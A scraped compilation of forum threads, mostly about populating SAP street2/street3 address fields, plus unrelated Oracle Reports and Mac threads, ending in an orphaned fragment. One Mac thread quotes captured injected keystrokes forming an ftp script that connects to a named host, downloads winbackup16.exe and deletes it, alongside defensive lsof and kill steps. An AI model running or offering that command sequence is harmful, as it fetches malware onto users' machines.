  • Fill additional details street2 and street3 using program rfbikr00

I am using the program rfbikr00  for creating vendors.
I want additonal fields like street2 and street3.
But the standard program does not have the provision.
can u please provide me the solution to get this done.

    Hello,
For additional address fields you need to run an extra migration step that is explained in the online help of the program you mention.
    Small extract:
There are additional address fields available due to linking the customer and vendor master and the respective contact persons to central address management. This additional address information is stored in central address management's own tables rather than being kept in the actual master tables (KNA1 for the customer master, LFA1 for the vendor master, KNVK for the contact persons).
A separate transfer run via the ALE interface is needed to transfer this additional address information. This run should be before the transfer run for master data.
    See Transfer of address data.
    Transfer address data
You can use the DX Workbench (transaction SXDA) to transfer address data.
Create a transfer project using the following object types:
BUS4001 for company and organization addresses (for example, customer address, vendor address, other office address of contact person)
BUS4002 for private addresses (of contact person)
BUS4003 for office addresses (composite work address of contact person).
The address data is entered by the SAVEREPLICA-BAPIs of these three object types.
For more information about these BAPIs and their interfaces, in particular the meaning of the key fields, see  "Distributing addresses via ALE" by choosing Basis --> Basis Services/Communication Interface --> Business Address Services in the SAP Library.
You can create example files for the DX Workbench from existing address records in the system (for example, in a customer master record ) with the programs RSDXBUS4001, RSDXBUS4002 and RSDXBUS4003. These example files show the meaning of all fields in the Business Address Services BAPI interfaces.
The programs have the same input parameters as the SAVEREPLICA-BAPIs.
    Success

  • Populating Street2 and Street3 through Idoc CREMAS

    Hi
Is there a way to populate the fields Street2 and Street3 while creating a vendor through the idoc CREMAS05?
    Thanks
    Nag

Look for an exit when posting IDOC and use this to populate any additional fields.
Try ACCID001, ACCID002  or search for BADIS.

  • Mapping Street2 and Street3 through idoc CREMAS

    Hi
Is there a way to populate the fields STREET2 and STREET3 through the idoc CREMAS05?
    Thanks
    Nag

    Hi Kris
Thanks for the info. But i could not find any table structure in the BAPI_BUPA_ADDRESS_CHANGE fn which holds the STREET2 and STREET3. Can you provide further info?
Thanks for your inputs so far.

  • LSMW - FD01 - unable to upload street2. street3. street4,stree5

    HI,
i was trying for LSMW for customer master - FI. when i create the LSMW i was Unable to see street2 and street3-5 .
Kindly let me know how to active this field when lsmw customer upload is used.
    With Regards
    Krishna

These fields exist on ADRC table, which are not included as a part of the standard 'Batch Input Recording' for FD01 in the LSMW. If you edit this in the "change object attributes" section to include this table, you might be able to have these streets in the upload.
I have not tested it to see if there were any other steps, but that seems to me the way to go...

  • ADRC Table

    Hi ,
I created a customer from XD01 and also filled the street field in same transaction but i did not fill street2 and street3 fields. I want to update street2 and street3 fields from an abap program.
I am trying to fill the customer's street2 and street3 field in ADRC table.
    But sy-subrc = 4. It is failing.
          UPDATE  adrc SET str_suppl1 = 'street1'
                                       str_suppl2 = 'street2'
                           WHERE addrnumber = 63534.
can someone tell y subrc is 4? why it is not getting updated?
    Thank u

    Hi,
Rather going to update adrc table directly, go for BDC of XD02 to update street2 and street3 into ADRC table. it will update into all relative tables of customer master like knc1. And if u use update query only on ADRC then it will show inconsistancy into data base and give u sy-subrc = 4.
<b>Rewards points if it is useful.</b>

  • RFBIDE00 - Address data issue

    Hi,
I want to populate the street2 and street3 fields of the customer master when uploading master data with LSMW using standard program - RFBIDE00 (Batch Input Program).
These fields are not available in structure BKNA1 provided by the standard program. I tried to use structure BIADDR2 instead. The data is converted properly and show in the structure. But, when I run the generated session, the fields for street2 and street3 are not populated.
    Has anyone done this?
Much appreciate if you let me know how to do this?
    Thanks,
    Shyam

    Hi Shyam,
Central address management fields cannot be transferred using the standard program. You have to do a second pass at it to get the full centrally managed address fields. Read documentation of the program. Here is an excerpt from it.
    <i>Additional address fields:
There are additional address fields available due to linking the customer and vendor master and the respective contact person to central address management. This additional address information is stored in central address management's own tables not in the actual master tables (KNA1 for the customer master, LFA1 for the vendor master, KNVK for the contact person).
A separate transfer run via the ALE interface is needed to transfer this additional address information. This run should be before the transfer run for master data.
    See Transfer of address data
If you use number ranges with internal number assignment when creating new customer and vendor masters, the number which is used to identify the master object in the system must be determined beforehand due to address information and master data being transferred separately.
You can determine the numbers using the following BAPIs:
    BAPI_VENDOR_GETINTNUMBER (for the vendor master)
    BAPI_CUSTOMER_GETINTNUMBER (for the customer master)
    BAPI_PARTNEREMPLOYEE_GETINTNUM (for the contact person)
Master data fields for which there is a counterpart in central address management (such as name, street, or telephone number) continue to be filled in the actual master tables. The formatting for these fields within central address management is different from the original formatting of the fields without the link to central address management. We therefore recommend that you only transfer the data for such fields when transferring central address management address information.</i>
If answered, please reward and close.

    Srinivas

  • Adding a field to an sql statement in Oracle Reports error ORA-00933

We have been requested to add a field that already exists in the table referred to by the sql statement in Oracle Reports Builder. The report was set up by a consultant about 3 yrs ago and we don't really have much skill in this area. What is happening when I try to modify the SQL statement, either adding a field or deleting a field to the SELECT statement, causes an error message preventing the statement from being saved. The only way out of the error message is to click Cancel. The error message is
    ORA-00933:SQL command not properly ended
    ORDER BY Program ==> NAME
Even adding or deleting a space anywhere in the SQL statement causes the error (not adding any new fields). A coworker found that if we comment out the ORDER BY, the statement will accept the new field in the SELECT section, however then we lose the order by functionality. I would like to add one additional field before the FROM. Not sure if any additional data are needed. Thank you.

    Hi Denis,
I tried your suggestion. The good thing is that adding the comma allowed me to be able to add a.campus to the select statement, unfortunately, another error message happened.
    ORA-00936: missing expression SELECT p . person_uid PIDM_KEY ,
    p . id_number , p . full_name_lfmi name , p . BIRTH_DATE , p . GENDER Sex ,
    Decode ( a . residency , 'D' , p . Primary_Ethnicity , 'F' ) Ethn , a . academic_period TERM ,
CASE WHEN : P_group_by = 'PROGRAM THEN a I started over and tried only putting in the comma and get the same message even though I didn't add campus. After that, removed the comma which led to the ORA-00933 error message. So once again, I had to close the file without saving, in order for the report to run at all.

  • DQM moving data from STREET 2 field in SAP to STREET 3 field

During the address cleanse function by DQM, it is currently taking the information I have supplied in SAP field STREET2 and moving and/or copying  it to STREET3. Does anyone know what is causing this or what the logic is being used to determine that this information belongs in the STREET 3 field in SAP?

    Hi Travis,
Did you ever get this resolved?  We have the same issue.
    Thanks!

  • Possible firewall/spyware hack going on??

    Hi there,
Can anyone help me? From time to time when I use my machine the keyboard seems to start typing things all on its own. If the cursor happens to be in a search field I can see what it is typing; otherwise the computer just beeps as it tries to make sense of keyboard inputs.
I have no idea if this is just a weird hardware thing going on, if I may have some spyware in my Mac (which is quite surprising) or someone is trying to hack my computer through an open port.
I managed to intercept some of the 'transmission' in TextEdit:
    cho open ftp1.killyourself.info 21 .. ik 7echo user mysql database .. ik 7echo binary .. ik 7echo get winbackup16.exe .. ik 7echo bye .. ik 7ftp -n -v -s;ik 7del ik 7winbackup16.exe 7exit
So far it hasn't managed to do anything malicious, apart from maybe annoy me by typing randomly while I am trying to rename a file in iTunes and other things like that. Does anyone have any ideas what might be happening, and how to solve it?
    Many thanks...

Wow. This sounds serious. You need to find this virus, kill it, and find out where it came from and lock down your computer. You can probably find it using Activity Monitor. If not, since it seems to be trying to get a exe file via ftp you can enter
    lsof -i :21
in Terminal. Keep trying. You should catch it. Note the pid. Next
    lsof -p pid
to see what files it has opened. (Enter the pid where I wrote pid)
In Activity Monitor, find the pid, inspect it, and note the parent process.
    Back in Terminal, enter
    kill -9 pid
At some point you might want to ask the registrant of killyourself.info

why some virus is trying to ftp to his site and download winbackup16.exe. Of course, he may have no idea what's going on. If so, he'd be interested to know that someone out there (including us now) know a username and password on his ftp server.
Report back with more info ASAP.

  • Address_into_printform

    Hi kind professionals,
We are still sadly using version 4.6c of SAP.
    Problem:
From what I have read in the OSS notes I can not print additional address fields like 'steet_2' and 'C/O' using the function module 'address_into_printform' from SAP script without implementing a customer exit and a BADI.
Please can you tell me if this is the case or have I missed something ?
Plus if above is correct, how do I pass the additional data to 'address_into_printform'.
I am pushing my luck but is there any sample code for a novice coder.
    More info.
    Using short form of address,
The documents in question are F8 invoice and packing note.

I have a similar problem, I need to print Street2 and street 3 (along with Street).  Is there any way to print these fields using the current ADDRESS ... ENDADDRESS code?
    Thank you

When I try to run this in my map I get the mapviewer error-05223 there is some other info as well:

Does anyone know how to overcome this problem?
